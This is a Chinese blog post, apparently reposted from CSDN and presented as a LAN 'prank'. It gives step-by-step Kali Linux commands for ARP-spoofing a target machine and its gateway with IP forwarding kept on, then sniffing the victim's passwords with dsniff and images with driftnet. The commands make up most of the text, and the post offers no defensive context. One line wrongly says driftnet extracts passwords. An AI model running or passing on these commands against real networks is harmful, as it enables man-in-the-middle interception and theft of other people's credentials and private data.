局域网内恶作剧_kali的arp攻击、密码嗅探、图片嗅探的演示

说明:阅读这篇博客并进行实际操作,需要对arp攻击过程有一定的了解。如果对此过程不了解的小伙伴可以先阅读这篇博客进行了解:arp欺骗攻击的全面讲解

一、进行arp攻击

首先,要进行嗅探操作,需要先对目标机器进行arp欺骗攻击。在上面引用的博客(arp欺骗攻击的全面讲解)中我们提到,arp攻击会让目标机器断网,但是我们这次要进行嗅探操作,是不能让目标机器断网的,所以需要进行转发代理操作。

命令行输入 cat /proc/sys/net/ipv4/ip_forward 即可查看当前转发状态,如果输出结果是 0 那么不转发则让目标机器断网。如果输出结果是 1 那么进行转发,也就是不让目标机器断网。

如果你输出的是 0 那么就可以输入 echo 1 > /proc/sys/net/ipv4/ip_forward 对转发状态进行修改,修改完后再输入 cat /proc/sys/net/ipv4/ip_forward ,如果此时输出的是 1 那么就可以进行下面的arp攻击操作了。
在这里插入图片描述
输入 arpspoof -i eth0 -t 192.168.16.20 -r 192.168.16.254,即可开始拦截并转发来自192.168.16.20机器向外发送数据包和外界发给他的数据包(也叫双向欺骗)。注意:此时,这台机器是没有断网的。

二、使用dsniff 进行密码嗅探

命令行输入 dsniff -i eth0 -m 即可开始密码嗅探。这个时候,我们登录4399,命令行能够看到刚才发送的请求。
在这里插入图片描述

三、使用driftnet进行图片嗅探

kali 系统上,我们可以借助工具 driftnet 对转发的数据包进行分析,分析出里面的相关密码,进行输出。如果未找到命令则需要先进行安装 apt-get install driftnet

命令行输入 driftnet -i eth0 -a -d img -s 即可开始图片嗅探。

-a 将抓取到的图片其保存到一个目录中,并在控制台输出名称。
-d 指定目录
-s 抓取声音

这个时候,我们就可以在 img 目录下看到截取到的相关图片。
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/cczxcce/article/details/107791697
今日推荐